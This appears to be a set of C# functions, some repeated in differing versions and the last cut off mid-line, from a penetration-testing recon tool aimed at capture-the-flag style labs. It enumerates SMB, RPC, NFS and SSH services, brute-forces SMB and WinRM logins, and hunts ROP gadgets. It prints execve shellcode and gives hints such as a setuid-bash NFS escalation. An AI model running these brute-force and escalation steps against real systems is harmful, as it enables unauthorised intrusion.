private static string QueryEnumDomUser(string ip, string user) { string returnInfo = ""; // Console.WriteLine("Debug Output: " + user); // user:[Guest] rid:[0x1f5] string userName = user.Remove(0, user.IndexOf("[") + 1); userName = userName.Substring(0, userName.IndexOf("]")); returnInfo += "-- " + userName + Environment.NewLine; List <string> infoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"queryuser " + userName + "\""); foreach (string info in infoList) { // padding1[0..7]... // logon_hrs[0..21].. if (!info.Contains(":")) { return(returnInfo); } string description = info.Substring(0, info.IndexOf(":")); description = description.Trim(); string value = info.Remove(0, info.IndexOf(":") + 1); value = value.Trim(); if (description == "Full Name" || description == "Home Drive" || description == "Comment" || description == "Description") { if (value != "") { returnInfo += "--- " + description + ": " + value + Environment.NewLine; } } } return(returnInfo.Trim(Environment.NewLine.ToCharArray())); }
private static string TestAnonymousAccess_Linux(string target) { if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient")) { string smbClientItems = ""; List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED")) { return("- No Anonymous Access"); } else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED")) { return("- It connected, but instantly disconnected you"); } else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available") { return("- Anonymous Access Allowed - But No Shares Found"); } else if (processResults.Count >= 1 && processResults[0].Contains("NT_STATUS_IO_TIMEOUT")) { return("- Timed out :("); } foreach (string item in processResults) { // type|name|comment if (item.Trim() != "SMB1 disabled -- no workgroup available" && item.Trim() != "Anonymous login successful") { try { string itemType = item.Split('|')[0]; string itemName = item.Split('|')[1]; string itemComment = item.Split('|')[2]; smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine; List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\""); if (subProcessResults.Count > 1 && !subProcessResults.Any(x => x.Contains("NT_STATUS_ACCESS_DENIED") || x.Contains("NT_STATUS_OBJECT_NAME_NOT_FOUND"))) { smbClientItems += "-- " + $"{itemName} has ls perms - {subProcessResults.Count} items found! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine; } } catch (Exception ex) { if (ex.Message.Contains("NT_STATUS_IO_TIMEOUT")) { smbClientItems = "-- Timeout - Try later :(" + Environment.NewLine; } else { Console.WriteLine($"TestAnonymousAccess_Linux - Error: {ex.Message} - Invalid item: {item} - Bug Reelix!"); } } } } return(smbClientItems.Trim(Environment.NewLine.ToCharArray())); } else { return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red)); } }
// Get Auth Methods public static string GetAuthMethods(string ip, int port) { string returnString = ""; if (string.IsNullOrEmpty(ip)) { Console.WriteLine("Error in ssh.GetAuthMethods - Missing IP"); return(""); } List <string> outputLines = General.GetProcessOutput("ssh", $"-o PreferredAuthentications=none -o StrictHostKeyChecking=no -o ConnectTimeout=5 {ip} -p {port}"); // kex_exchange_identification: read: Connection reset by peer if (outputLines.Count == 1 && outputLines[0].EndsWith("Connection refused")) { return("- Port is closed"); } if (outputLines.Count == 1 && outputLines[0].Contains("no matching key exchange method found. Their offer:")) { return("- Weird Auth Method: " + outputLines[0]); } if (outputLines.Count == 1 && outputLines[0].Trim() == "kex_exchange_identification: Connection closed by remote host") { return("- They have no auth methods to give you"); } if (outputLines.Contains("kex_exchange_identification: read: Connection reset by peer")) { returnString = "- Port is open, but connection reset with no info :("; return(returnString); } if (!outputLines.Any(x => x.Contains("Permission denied"))) { if ((outputLines.Count == 1 || outputLines.Count == 2) && outputLines[0].Contains("Connection timed out")) { return("Timed out :("); } else { Console.WriteLine("Error in ssh.GetAuthMethods - No Permission denied found"); foreach (string line in outputLines) { Console.WriteLine($"Debug: --> {line}"); } return(""); } } returnString = outputLines.First(x => x.Contains("Permission denied")); returnString = returnString.Remove(0, returnString.IndexOf("(")); returnString = returnString.Replace("(", "").Replace(")", ""); // ssh - oPreferredAuthentications = none - oStrictHostKeyChecking = no 10.10.10.147 // [email protected]: Permission denied(publickey, password). // [email protected]: Permission denied (publickey,keyboard-interactive). return(returnString); }
private static List <string> RunCommand(string ip, string command, bool signing) { List <string> processOutput = new List <string>(); if (signing) { processOutput = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"{command}\""); } else { processOutput = General.GetProcessOutput("rpcclient", $"-S off -U \"anonymous\"%\"\" {ip} -c \"{command}\""); } return(processOutput); }
public static string GetInfo(string ip) { string toReturn = ""; if (General.GetOS() == General.OS.Linux) { if (General.IsInstalledOnLinux("svn")) { // svn info svn://ip - Anything super useful? string processOutput = string.Join("|", General.GetProcessOutput("svn", "log svn://" + ip)); List <string> commitList = processOutput.Split(new[] { "------------------------------------------------------------------------" }, StringSplitOptions.None).ToList(); commitList.RemoveAll(string.IsNullOrEmpty); foreach (string commit in commitList) { List <string> splitItems = commit.Split('|').ToList(); splitItems.RemoveAll(string.IsNullOrEmpty); // 0 - Revision // 1 - Name // 2 - Date // 3 - Lines (?) // 4 - Comment try { string commitRevision = splitItems[0].Trim(); int commitDiff = int.Parse(commitRevision.Replace("r", "")) - 1; // Indexes - How do they work! string commitName = splitItems[1].Trim(); string commitDate = splitItems[2]; string commitLines = splitItems[3]; string commitComments = splitItems[4]; string commitInfo = "- Commit " + commitRevision + " by " + commitName + " - " + commitComments + " ( svn diff -r" + commitDiff + " svn://" + ip + " )"; toReturn += commitInfo + Environment.NewLine; } catch (Exception ex) { toReturn += "- Conversion Error: " + ex.Message + Environment.NewLine; } } toReturn = toReturn.Trim(Environment.NewLine.ToCharArray()); } else { Console.WriteLine("svn is not installed - Skipping enumeration (You probably want to 'svn install subversion')"); } } else { Console.WriteLine("svn.GetInfo currently lacks Windows support. Bug Reelix."); } return(toReturn); }
public static string GetInfo(string target, int port) { string toReturn = ""; if (!General.IsInstalledOnLinux("rpcinfo")) { toReturn = "- " + "Error: Cannot find rpcinfo - Unable to enumerate - install rpcbind".Pastel(Color.Red); } else { List <string> processOutput = General.GetProcessOutput("rpcinfo", "-p " + target); foreach (string item in processOutput) { toReturn += "- " + item + Environment.NewLine; } } return(toReturn.Trim(Environment.NewLine.ToCharArray())); }
public static string GetInfo(string ip, int port) { // https://raymii.org/s/tutorials/Get_DNS_server_version_and_hide_it_in_BIND.html string dnsInfo = ""; List <string> outputLines = General.GetProcessOutput("nslookup", $"-type=txt -class=chaos version.bind {ip}"); if (outputLines.Count > 0 && outputLines[0].Trim() == "*** Request to UnKnown timed-out") { dnsInfo = "- No Info Available"; } else { foreach (string line in outputLines) { dnsInfo += $"- {line}" + Environment.NewLine; } } dnsInfo = dnsInfo.Trim(Environment.NewLine.ToCharArray()); return(dnsInfo); }
private static string TestAnonymousAccess_Linux(string target) { if (General.IsInstalledOnLinux("smbclient", "/usr/bin/smbclient")) { string smbClientItems = ""; List <string> processResults = General.GetProcessOutput("smbclient", $" -L {target} --no-pass -g"); // null auth if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_ACCESS_DENIED")) { return("- No Anonymous Access"); } else if (processResults.Count == 1 && processResults[0].Contains("NT_STATUS_CONNECTION_DISCONNECTED")) { return("- It connected, but instantly disconnected you"); } else if (processResults.Count == 2 && processResults[0] == "Anonymous login successful" && processResults[1] == "SMB1 disabled -- no workgroup available") { return("- Anonymous Access Allowed - But No Shares Found"); } foreach (string item in processResults) { // type|name|comment if (!item.StartsWith("SMB1 disabled")) { string itemType = item.Split('|')[0]; string itemName = item.Split('|')[1]; string itemComment = item.Split('|')[2]; smbClientItems += "- " + itemType + ": " + itemName + " " + (itemComment == "" ? "" : "(" + itemComment.Trim() + ")") + Environment.NewLine; List <string> subProcessResults = General.GetProcessOutput("smbclient", $"//{target}/{itemName} --no-pass -c \"ls\""); if (subProcessResults.Count > 1) { smbClientItems += "-- " + $"{itemName} has ls perms! -> smbclient //{target}/{itemName} --no-pass".Pastel(Color.Orange) + Environment.NewLine; } } } return(smbClientItems.Trim(Environment.NewLine.ToCharArray())); } else { return("- Error: Cannot find /usr/bin/smbclient - Please install it".Pastel(Color.Red)); } }
private static void WinRMBrute_Windows(string ip, string userFile, string passFile) { List <string> userList = File.ReadAllLines(userFile).ToList(); List <string> passList = File.ReadAllLines(passFile).ToList(); // Perms List <string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force"); if (permLines.Count != 0) { if (permLines[0].Trim() == "Set-Item : Access is denied.") { Console.WriteLine("You need to run Reecon in an Administrative console for this functionality"); return; } } foreach (string user in userList) { foreach (string pass in passList) { Console.Write("Testing " + user + ":" + pass + " - "); List <string> processResult = General.GetProcessOutput("powershell", "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ('" + user + "', (ConvertTo-SecureString \"" + pass + "\" -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue"); if (processResult.Count != 0) { Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("Success!"); Console.ForegroundColor = ConsoleColor.White; } else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("Failed"); Console.ForegroundColor = ConsoleColor.White; } } } General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts '' -Force"); }
private static void ScanFile(string fileName) { if (!fileName.StartsWith("./")) { Console.WriteLine("fileName must start with ./"); return; } Architecture architecture = IDElf(fileName); if (architecture == Architecture.x86) { Console.WriteLine("Architecture: x86"); // You can get a segfault address of x86 programs by going // dmesg | tail -2 (Sometimes the last entry isn't for it) // dmesg | grep "ret2win32" | tail -1 // pwn cyclic 500 // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5); List <string> dmesgOutput = General.GetProcessOutput("dmesg", ""); foreach (string item in dmesgOutput) { // segfault at 6161616c ip 000000006161616c x if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at ")) { Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9)); } } } else if (architecture == Architecture.x64) { Console.WriteLine("Architecture: x64"); // TODO: Find where it segfaults, -1 } else { Console.WriteLine("Architecture: Unknown - Can only deal with ELFs"); } if (General.IsInstalledOnLinux("ropper")) { List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace(": ret;", ""); if (pwnItem.Length == 18) // x64 { pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address } else { Console.WriteLine("Not 18 - " + pwnItem.Length); } Console.WriteLine("- ret; (Only function calls) --> " + pwnItem); } } ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]")) { string pwnItem = item.Trim();; pwnItem = pwnItem.Replace(": pop rdi; ret;", ""); if (pwnItem.Length == 18) { pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address } else { Console.WriteLine("Not 18 - " + pwnItem.Length); } Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem); } } ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\""); foreach (string item in ropperOutput) { if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh")) { string pwnItem = item.Trim(); pwnItem = pwnItem.Replace("/bin/sh", "").Trim();; if (pwnItem.Length == 10) { pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")"; // 0x16 - x64 address } else { Console.WriteLine("Not 10 - " + pwnItem.Length); } Console.WriteLine("- /bin/sh --> " + pwnItem); } } // // ropper --file sudo_pwn_file_here --string "/bin/sh" } else { Console.WriteLine("- ropper is not installed - Skipping gadget check and string search"); } if (General.IsInstalledOnLinux("rabin2")) { List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName); foreach (string item in rabin2Output) { if (item.Trim().StartsWith("nx") && item.Contains("false")) { Console.WriteLine("- nx is disabled - You can run your own shellcode!"); if (architecture == Architecture.x64) { Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"); } else { // http://shell-storm.org/shellcode/ Console.WriteLine("Bug Reelix to fix his code!"); } } else if (item.Trim().StartsWith("nx") && item.Contains("true")) { Console.WriteLine("- nx is enabled - No custom shellcode for you!"); } } } else { Console.WriteLine("- rabin2 is not installed - Skipping nx check"); } if (General.IsInstalledOnLinux("objdump")) { List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}"); foreach (string item in objdumpOutput) { if (item.Contains("call") && item.Contains("system")) // callq contains call { Console.WriteLine("- system --> " + item); } if (item.Trim().EndsWith(" <puts@plt>:")) { Console.WriteLine("- puts@plt (plt_puts) --> " + item); } if (item.Contains("puts@GLIBC")) { Console.WriteLine("- puts@GLIBC (got_puts) --> " + item); } } objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}"); foreach (string item in objdumpOutput) { // .text = Name // " g" = Global if (item.Contains(".text") && item.Contains(" g ")) { Console.WriteLine("- Useful Symbol: " + item); } } // objdump -t ./file.elf | grep .text } else { Console.WriteLine("- objdump is not installed - Skipping syscalls"); } Console.WriteLine("Finished"); }
public static string GetInfo(string target, int port) { // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse string fileList = ""; if (General.GetOS() == General.OS.Windows) { if (File.Exists(@"C:\Windows\System32\showmount.exe")) { List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target); if (outputLines.Count > 1) { outputLines.RemoveAt(0); fileList = "- Files:" + Environment.NewLine; foreach (string line in outputLines) { fileList += "-- " + line + Environment.NewLine; } fileList = fileList.Trim(Environment.NewLine.ToCharArray()); fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:"; } fileList = fileList.Trim(Environment.NewLine.ToCharArray()); return(fileList); } else { fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility"; return(fileList); } } else if (General.GetOS() == General.OS.Linux) { if (General.IsInstalledOnLinux("showmount")) // "/sbin/showmount" OR "/usr/sbin/showmount" { List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target); foreach (string line in showmountOutput) { // https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash // NFS V1 if (line.Trim().EndsWith("*")) { fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine; fileList += "-- NFSV1 -> " + "sudo mount -t nfs {target}:/mountNameHere /tmp/mount/ -nolock".Pastel(Color.Orange) + Environment.NewLine; fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine; } // NFS V2 else if (line.Contains(" (everyone)")) { fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine; fileList += "-- NFSV2 -> " + $"sudo mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine; fileList += "--- " + "Try copy over a version of bash onto the share, +s +x it, then ./bash -p".Pastel(Color.Orange) + Environment.NewLine; } else { fileList += "- " + line + Environment.NewLine; } } return(fileList.Trim(Environment.NewLine.ToCharArray())); // // Windows // // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2 /* * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature"); * ManagementObjectCollection objMOC = objMC.GetInstances(); * foreach (ManagementObject objMO in objMOC) * { * //Console.WriteLine("Woof!"); * string featureName = (string)objMO.Properties["Name"].Value; * if (!featureName.ToUpper().Contains("NFS")) * { * continue; * } * uint installState = 0; * try * { * installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown * } * catch * { * Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value); * } * * //add to my list * Console.WriteLine("Installed: " + featureName + " -> " + installState); * } */ } else { return("- Error - showmount is not installed - Unable to enumerate! Run: sudo apt install nfs-common".Pastel(Color.Red)); } } else { Console.WriteLine("Error - OS Not Supportd - Bug Reelix"); } return(""); }
public static void SMBBrute(string[] args) { // TODO: This still shows "Success" if: // - The username doesn't exist // - There is a space in the password if (!RuntimeInformation.IsOSPlatform(OSPlatform.Linux)) { Console.WriteLine("SMB Brute only currently works in Linux - Heh :p"); return; } if (args.Length != 4) { Console.WriteLine("SMB Brute Usage: reecon -smb-brute IP Userfile Passfile"); return; } string ip = args[1]; string userFile = args[2]; string passFile = args[3]; if (!File.Exists(userFile)) { Console.WriteLine("Unable to find UserFile: " + userFile); return; } if (!File.Exists(passFile)) { Console.WriteLine("Unable to find Passfile: " + passFile); return; } List <string> userList = File.ReadAllLines(userFile).ToList(); List <string> passList = File.ReadAllLines(passFile).ToList(); foreach (string user in userList) { foreach (string pass in passList) { List <string> outputResult = General.GetProcessOutput("smbclient", @"-L \\\\" + ip + " -U" + user + "%" + pass); outputResult.RemoveAll(x => x.Equals("Unable to initialize messaging context")); string resultItem = outputResult[0]; if (resultItem.Contains("NT_STATUS_HOST_UNREACHABLE")) { Console.WriteLine("Error - Unable to contact \\\\" + ip); return; } else if (resultItem.Contains("NT_STATUS_LOGON_FAILURE")) { Console.WriteLine(user + ":" + pass + " - Failed"); } else if (resultItem.Contains("NT_STATUS_UNSUCCESSFUL")) { Console.WriteLine("Fatal Error: " + resultItem); return; } else { Console.WriteLine(user + ":" + pass + " - Success!"); return; } } } // smbclient -L \\\\10.10.10.172 -USABatchJobs%SABatchJobs }
private static string GetRPCInfo(string ip) { string rpcInfo = ""; bool anonAccess = false; if (General.GetOS() == General.OS.Linux) { if (General.IsInstalledOnLinux("rpcclient", "/usr/bin/rpcclient")) { // Find the Domain Name List <string> domainNameList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaquery\""); domainNameList.RemoveAll(x => !x.StartsWith("Domain Name:")); if (domainNameList.Count == 1) { anonAccess = true; rpcInfo += "- " + domainNameList[0] + Environment.NewLine; } // Find basic users List <string> enumdomusersList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"enumdomusers\""); if (enumdomusersList.Count == 0) { List <string> srvinfoList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"srvinfo\""); if (srvinfoList.Count != 0) { anonAccess = true; rpcInfo += "- srvinfo: " + srvinfoList[0] + Environment.NewLine; } // Find public SIDs with lsaenumsid List <string> sidList = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lsaenumsid\""); if (sidList.Count != 0) { anonAccess = true; rpcInfo += "- Found SIDs" + Environment.NewLine; // Remove the "found X SIDs" text sidList.RemoveAll(x => x.StartsWith("found ")); // Remove blanks sidList.RemoveAll(x => string.IsNullOrEmpty(x)); string sidListString = string.Join(' ', sidList); // Enumerate the rest List <string> sidResolution = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids {sidListString}\""); if (sidResolution.Count != 0) { foreach (string result in sidResolution) { rpcInfo += "-- " + result + Environment.NewLine; } } } // Find sneaky SIDs List <string> sneakyNameLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupnames administrator guest krbtgt root bin none"); sneakyNameLookup.RemoveAll(x => !x.Contains("(User: "******"-") + 1); if (!sneakySIDBaseList.Contains(sneakySIDBase)) { sneakySIDBaseList.Add(sneakySIDBase); } } } if (sneakySIDBaseList.Count != 0) { List <string> sneakySIDList = new List <string>(); foreach (string sneakyBase in sneakySIDBaseList) { // Low ones are just system names - Can ignore them - Proper ones start from 1000 sneakySIDList.Add(sneakyBase + "1000"); sneakySIDList.Add(sneakyBase + "1001"); sneakySIDList.Add(sneakyBase + "1002"); sneakySIDList.Add(sneakyBase + "1003"); sneakySIDList.Add(sneakyBase + "1004"); sneakySIDList.Add(sneakyBase + "1005"); sneakySIDList.Add(sneakyBase + "1006"); sneakySIDList.Add(sneakyBase + "1007"); sneakySIDList.Add(sneakyBase + "1008"); sneakySIDList.Add(sneakyBase + "1009"); sneakySIDList.Add(sneakyBase + "1010"); List <string> sneakySIDLookup = General.GetProcessOutput("rpcclient", $"-U \"\"%\"\" {ip} -c \"lookupsids " + string.Join(" ", sneakySIDList) + "\""); if (sneakySIDLookup.Count != 0) { foreach (string lookupResult in sneakySIDLookup) { string name = lookupResult.Substring(0, lookupResult.IndexOf(" (1)")); name = name.Remove(0, name.LastIndexOf("\\") + 1); // Invalid ones simply have the number itself instead of the name // A bit hacky, but it works if (!int.TryParse(name, out int toIgnore)) { rpcInfo += "-- Sneaky Name Found: " + name + Environment.NewLine; } } } } } } } else // Count > 0 { string firstItem = enumdomusersList[0]; if (firstItem.Contains("user:"******"rid:")) { // All is fine if (enumdomusersList.Count >= 3) { Console.WriteLine("Found a lot of useful RPC info - Output may take a few seconds longer than expected"); } rpcInfo = "- User Listing" + Environment.NewLine; foreach (string user in enumdomusersList) { rpcInfo += QueryEnumDomUser(ip, user); } // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/ rpcInfo += "--> rpcclient -> setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine; } else if (firstItem == "Cannot connect to server. Error was NT_STATUS_RESOURCE_NAME_NOT_FOUND") { rpcInfo = "- Cannot connect - Are you sure it's up?" + Environment.NewLine; } else if (firstItem == "Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT") { rpcInfo = "- Cannot connect - It timed out :<" + Environment.NewLine; } else if (firstItem == "Cannot connect to server. Error was NT_STATUS_CONNECTION_DISCONNECTED") { rpcInfo = "- Cannot connect - It kicks you out instantly" + Environment.NewLine; } else { foreach (string item in enumdomusersList) { Console.WriteLine("Debug Info item: " + item); } rpcInfo = "- Unknown items in NETBIOS.GetRPCInfo - Bug Reelix (Check Debug Info Item output)" + Environment.NewLine; } } if (anonAccess == true) { rpcInfo += "- " + $"Anonymous access permitted! -> rpcclient -U \"\"%\"\" {ip}".Pastel(Color.Orange) + Environment.NewLine; } else { rpcInfo += "- No anonymous RPC access" + Environment.NewLine; // 23 -> https://room362.com/post/2017/reset-ad-user-password-with-linux/ rpcInfo += "-- If you get access -> enumdomusers / queryuser usernameHere / setuserinfo2 userNameHere 23 'newPasswordHere'" + Environment.NewLine; } } else { rpcInfo = "- Error: Cannot find /usr/bin/rpcclient - Please install smbclient (Includes it)".Pastel(Color.Red) + Environment.NewLine; } } else { rpcInfo = "- No RPC Info - Try run on Linux (rpcclient)" + Environment.NewLine; } return(rpcInfo); }
public static string GetInfo(string target, int port) { // TODO: https://svn.nmap.org/nmap/scripts/nfs-ls.nse string fileList = ""; if (General.GetOS() == General.OS.Windows) { if (File.Exists(@"C:\Windows\System32\showmount.exe")) { List <string> outputLines = General.GetProcessOutput(@"C:\Windows\System32\showmount.exe", "-e " + target); if (outputLines.Count > 1) { outputLines.RemoveAt(0); fileList = "- Files:" + Environment.NewLine; foreach (string line in outputLines) { fileList += "-- " + line + Environment.NewLine; } fileList = fileList.Trim(Environment.NewLine.ToCharArray()); fileList += Environment.NewLine + $"- To Mount --> mount \\\\{target}\\shareNameHere x:"; } fileList = fileList.Trim(Environment.NewLine.ToCharArray()); return(fileList); } else { fileList = "- showmount does not exist - Bug Reelix to update this section for more compatibility"; return(fileList); } } else if (General.GetOS() == General.OS.Linux) { if (General.IsInstalledOnLinux("showmount", "/sbin/showmount") == true) { List <string> showmountOutput = General.GetProcessOutput("showmount", "-e " + target); foreach (string line in showmountOutput) { if (line.Contains(" (everyone)")) { fileList += "- " + line.Pastel(Color.Orange) + Environment.NewLine; fileList += "-- " + $"mount -t nfs -o vers=2 {target}:/mountNameHere /mnt".Pastel(Color.Orange) + Environment.NewLine; } else { fileList += "- " + line + Environment.NewLine; } } return(fileList.Trim(Environment.NewLine.ToCharArray())); // // Windows // // ManagementClass objMC = new ManagementClass("Win32_ServerFeature"); // Only in Windows Server 2008 / R2 /* * ManagementClass objMC = new ManagementClass("Win32_OptionalFeature"); * ManagementObjectCollection objMOC = objMC.GetInstances(); * foreach (ManagementObject objMO in objMOC) * { * //Console.WriteLine("Woof!"); * string featureName = (string)objMO.Properties["Name"].Value; * if (!featureName.ToUpper().Contains("NFS")) * { * continue; * } * uint installState = 0; * try * { * installState = (uint)objMO.Properties["InstallState"].Value; // 1 = Enabled, 2 = Disabled, 3 = Absent, 4 = Unknown * } * catch * { * Console.WriteLine("Error - InstallState is: " + (string)objMO.Properties["InstallState"].Value); * } * * //add to my list * Console.WriteLine("Installed: " + featureName + " -> " + installState); * } */ } } else { Console.WriteLine("Error - OS Not Supportd - Bug Reelix"); } return(""); }
public static string DefaultScan(string[] args, bool mustPing) { // ip[0] // outputfile[1] if (args.Length < 1) { Console.WriteLine("Usage: ip outfile"); Environment.Exit(0); } string target = ""; string fileName = ""; if (args.Length == 1) { target = args[0]; Console.WriteLine("Outfile name (1 word, no extension)"); fileName = Console.ReadLine(); } else if (args.Length == 2) { target = args[0]; fileName = args[1]; } if (General.GetOS() == General.OS.Windows) { List <string> nmapOutput = General.GetProcessOutput("nmap", "-V"); if (nmapOutput.Count == 0 || !nmapOutput[0].Contains("https://nmap.org")) { Console.WriteLine("Error - nmap is not installed"); Environment.Exit(0); } } // Check if nmap is installed else if (General.GetOS() == General.OS.Linux) { if (!General.IsInstalledOnLinux("nmap")) { Console.WriteLine("Error - nmap is not installed"); Environment.Exit(0); } } else { Console.WriteLine("Error - There is no nmap detection on this OS :<"); Environment.Exit(0); } DateTime beforeNmapDate = DateTime.Now; Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile..."); string noPing = mustPing ? "" : " -Pn "; if (General.GetOS() == General.OS.Linux) { General.RunProcess($"sudo", $"nmap -sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap"); } else { General.RunProcess($"nmap", $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap"); } DateTime afterNmapDate = DateTime.Now; TimeSpan nmapScanDuration = afterNmapDate - beforeNmapDate; Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon"); return(fileName); }
private static void ScanFile(string fileName) { if (!fileName.StartsWith("./")) { Console.WriteLine("fileName must start with ./"); return; } Architecture architecture = IDFile(fileName); if (architecture == Architecture.Linux86) { Console.WriteLine("Architecture: x86"); // You can get a segfault address of x86 programs by going // dmesg | tail -2 (Sometimes the last entry isn't for it) // dmesg | grep "ret2win32" | tail -1 // pwn cyclic 500 // aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae if (General.IsInstalledOnLinux("pwn")) { General.RunProcess("/bin/bash", " -c \"echo 